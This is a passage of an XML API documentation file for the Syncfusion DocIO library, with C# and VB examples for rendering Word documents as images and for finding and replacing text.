            Get's Ordinal in English (Default)
            </summary>
            <param name="num"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Close">
            <summary>
            Release the resources occupied by this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Dispose">
            <summary>
            Releases all resources used by the object.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CompareArray(System.Byte[],System.Byte[])">
            <summary>
            Compares the array.
            </summary>
            <param name="buffer1">The buffer1.</param>
            <param name="buffer2">The buffer2.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloseContent">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloseSecContent">
            <summary>
            Closes the content of the sections.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.CloseStyles">
            <summary>
            Closes the styles.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.RenderAsImages(Syncfusion.DocIO.DLS.ImageType)">
            <summary>
            Converts the whole document into an images.
            </summary>
            <param name="type">An ImageType that specifies the type of the image to render.</param>
            <returns>Return the array of images that contains the each document page as single image.</returns>
            <remarks>
                <para>
                    Layouting the contents of a Word document as pages in the Essential DocIO is not exactly the same as the layouting in Microsoft Word. So, the total number of pages and each page content may vary slightly compared to that of the Microsoft Word.
                </para>
                <para>
                    This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.
                </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document to image.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal;
                //Convert word document to image
                Image[] images = wordDocument.RenderAsImages(ImageType.Bitmap);
                int i = 0;
                foreach (Image image in images)
                {
                    //Save the images as jpeg
                    image.Save("WordToImage_" + i + ".jpeg", ImageFormat.Jpeg);
                    i++;
                }
                //Close the document
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal
                'Convert word document to image
                Dim images As Image() = wordDocument.RenderAsImages(ImageType.Bitmap)
                Dim i As Integer = 0
                For Each image As Image In images
                    'Save the images as jpeg
                    image.Save("WordToImage_" &amp; i &amp; ".jpeg", ImageFormat.Jpeg)
                    i += 1
                Next
                'Close the document
                wordDocument.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.RenderAsImages(System.Int32,System.Drawing.Imaging.ImageFormat)">
            <summary>
            Converts the specified document page into image.
            </summary>
            <param name="pageIndex">
            The zero based page index that represent which page to convert.
            </param>
            <param name="type">
            An ImageFormat that specifies the format of the saved image.
            </param>
            <returns>
            An <see cref="T:System.IO.Stream"/> that represent specified document page as image.
            </returns>
            <remarks>
                <para>
                    Layouting the contents of a Word document as pages in the Essential DocIO is not exactly the same as the layouting in Microsoft Word. So, the total number of pages may vary slightly compared to that of the Microsoft Word.
                </para>
                <para>
                    This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.
                </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document to image.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal;
                //Convert word document to stream
                Stream imageStream = wordDocument.RenderAsImages(2, System.Drawing.Imaging.ImageFormat.Bmp);
                //Convert the stream to Image
                Image image = Image.FromStream(imageStream);
                //Save the image as jpeg
                image.Save("WordToImage.jpeg", ImageFormat.Jpeg);
                //Close the document
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal
                'Convert word document to stream
                Dim imageStream As Stream = wordDocument.RenderAsImages(2, System.Drawing.Imaging.ImageFormat.Bmp)
                'Convert the stream to Image
                Dim image As Image = Image.FromStream(imageStream)
                'Save the image as jpeg
                image.Save("WordToImage.jpeg", ImageFormat.Jpeg)
                'Close the document
                wordDocument.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.RenderAsImages(System.Int32,Syncfusion.DocIO.DLS.ImageType)">
            <summary>
            Converts the specified document page into image.
            </summary>
            <param name="pageIndex">
            The zero based page index that represent which page to convert.
            </param>
            <param name="type">
            An ImageType that specifies the type of the image to render.
            </param>
            <returns>
            An <see cref="T:System.Drawing.Image"/> that represent specified document page as image.
            </returns>
            <remarks>
                <para>
                    Layouting the contents of a Word document as pages in the Essential DocIO is not exactly the same as the layouting in Microsoft Word. So, the total number of pages may vary slightly compared to that of the Microsoft Word.
                </para>
                <para>
                    This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.
                </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to convert the specified Word document page as image.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal;
                //Convert word document to image
                Image image = wordDocument.RenderAsImages(2, ImageType.Bitmap);
                //Save the image
                image.Save("WordToImage.jpeg", ImageFormat.Jpeg);
                //Close the document
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal
                'Convert word document to image
                Dim image As Image = wordDocument.RenderAsImages(2, ImageType.Bitmap)
                'Save the images as jpeg
                image.Save("WordToImage_" &amp; i &amp; ".jpeg", ImageFormat.Jpeg)
                'Close the document
                wordDocument.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.RenderAsImages(System.Int32,System.Int32,Syncfusion.DocIO.DLS.ImageType)">
            <summary>
            Converts the specified range of document pages into images
            </summary>
            <param name="pageIndex">
            The zero based page index that represents the starting document page index.
            </param>
            <param name="noOfPages">
            The total number of pages to convert.
            </param>
            <param name="type">
            An ImageType That specifies the type of the image to render.
            </param>
            <returns>
            An array of images that represent specified range of document pages as images.
            </returns>
            <remarks>
                <para>
                    Layouting the contents of a Word document as pages in the Essential DocIO is not exactly the same as the layouting in Microsoft Word. So, the total number of pages may vary slightly compared to that of the Microsoft Word.
                </para>
                <para>
                    This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.
                </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document to image.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal;
                //Convert word document to image
                Image[] images = wordDocument.RenderAsImages(0, 2, ImageType.Bitmap);
                int i = 0;
                foreach (Image image in images)
                {
                    //Save the images as jpeg
                    image.Save("WordToImage_" + i + ".jpeg", ImageFormat.Jpeg);
                    i++;
                }
                //Close the document
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal
                'Convert word document to image
                Dim images As Image() = wordDocument.RenderAsImages(0, 2, ImageType.Bitmap)
                Dim i As Integer = 0
                For Each image As Image In images
                    'Save the images as jpeg
                    image.Save("WordToImage_" &amp; i &amp; ".jpeg", ImageFormat.Jpeg)
                    i += 1
                Next
                'Close the document
                wordDocument.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Find(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the text based on specified regular expression.
            </summary>
            <param name="pattern">
            The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of a particular text in the document
                TextSelection textSelection = document.Find(new Regex("panda"));
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of a particular text in the document
                Dim textSelection As TextSelection = document.Find(New Regex("panda"))
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindSingleLine(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the first entry of specified pattern of text in single-line mode which is extended to several paragraph in the document.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> collection that contains the found text in the document.</returns>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text extended to several paragraphs in the document
                TextSelection[] textSelections = document.FindSingleLine(new Regex("First paragraph Second paragraph"));
                WParagraph paragraph = null;
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set highlight color
                    WTextRange textRange = textSelection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.YellowGreen;
                    paragraph = textRange.OwnerParagraph;
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text extended to several paragraphs in the document
                Dim textSelections As TextSelection() = document.FindSingleLine(new Regex("First paragraph Second paragraph"))
                Dim paragraph As WParagraph = Nothing
                  For Each textSelection As TextSelection In textSelections
                      'Get the found text as single text range and set highlight color
                      Dim textRange As WTextRange = textSelection.GetAsOneRange()
                      textRange.CharacterFormat.HighlightColor = Color.YellowGreen
                      paragraph = textRange.OwnerParagraph
                  Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Find(System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds the text based on specified string, taking into the consideration of caseSensitive and wholeWord options.
            </summary>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of a particular text in the document
                TextSelection textSelection = document.Find("panda", true, true);
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of a particular text in the document
                Dim textSelection As TextSelection = document.Find("panda", true, true)
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindSingleLine(System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds the first entry of specified pattern of text in single-line mode which is extended to several paragraph in the document, taking into the consideration of caseSensitive and wholeWord options.
            </summary>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> collection that contains the found text in the document.</returns>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text extended to several paragraphs in the document
                TextSelection[] textSelections = document.FindSingleLine("First paragraph Second paragraph", True, False);
                WParagraph paragraph = null;
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set highlight color
                    WTextRange textRange = textSelection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.YellowGreen;
                    paragraph = textRange.OwnerParagraph;
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text extended to several paragraphs in the document
                Dim textSelections As TextSelection() = document.FindSingleLine("First paragraph Second paragraph", True, False)
                Dim paragraph As WParagraph = Nothing
                  For Each textSelection As TextSelection In textSelections
                      'Get the found text as single text range and set highlight color
                      Dim textRange As WTextRange = textSelection.GetAsOneRange()
                      textRange.CharacterFormat.HighlightColor = Color.YellowGreen
                      paragraph = textRange.OwnerParagraph
                  Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindAll(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds and returns all entries of the specified regular expression.
            </summary>
            <param name="pattern">
            The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> collection that contains all the entries of the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to search a particular text and highlight it.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Find the occurrence of the Word "panda" in the document
                TextSelection[] textSelection = document.FindAll(new Regex("panda"));
                //Iterate through each occurrence and highlight it
                foreach (TextSelection selection in textSelection)
                {
                    IWTextRange textRange = selection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.Yellow;
                }
                //Save and Close the document
                document.Save("Result.docx");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Find the occurrence of the word "panda" in the document
                Dim textSelection As TextSelection() = document.FindAll(new Regex("panda"))
                'Iterate through each occurrence and highlight it
                For Each selection As TextSelection In textSelection
                    Dim textRange As IWTextRange = selection.GetAsOneRange()
                    textRange.CharacterFormat.HighlightColor = Color.Yellow
                Next
                document.Save("Result.docx")
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.FindAll(System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds and returns all entries of the specified string, taking into the consideration of caseSensitive and wholeWord options.
            </summary>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> collection that contains all the entries of the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to search a particular text and highlight it.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Find the occurrence of the Word "panda" in the document
                TextSelection[] textSelection = document.FindAll("panda", false, true);
                //Iterate through each occurrence and highlight it
                foreach (TextSelection selection in textSelection)
                {
                    IWTextRange textRange = selection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.Yellow;
                }
                //Save and Close the document
                document.Save("Result.docx");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Find the occurrence of the word "panda" in the document
                Dim textSelection As TextSelection() = document.FindAll("panda", false, true)
                'Iterate through each occurrence and highlight it
                For Each selection As TextSelection In textSelection
                    Dim textRange As IWTextRange = selection.GetAsOneRange()
                    textRange.CharacterFormat.HighlightColor = Color.Yellow
                Next
                document.Save("Result.docx")
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of the given <see cref="T:System.Text.RegularExpressions.Regex"/> with the replace string.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Replace all occurrence of a particular text in the document
                document.Replace(new Regex("Paragraph"),"paragraph");            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Replace all occurrence of a particular text in the document
                document.Replace(New Regex("Paragraph"), "paragraph")
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with replace string, taking into
            consideration of case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Replace all occurrence of a particular text in the document
                document.Replace("Paragraph","paragraph", false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Replace all occurrence of a particular text in the document
                document.Replace("Paragraph", "paragraph", False, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace("Giant panda", selection, true, false);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace("Giant panda", selection, True, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive, whole word and formatting options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="saveFormatting">Set to <b>true </b>if to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace("Giant panda", selection, true, false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace("Giant panda", selection, True, False, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the specified regular expression with a <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> in the document.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace(new Regex("Giant panda"), selection);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace(New Regex("Giant panda"), selection)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
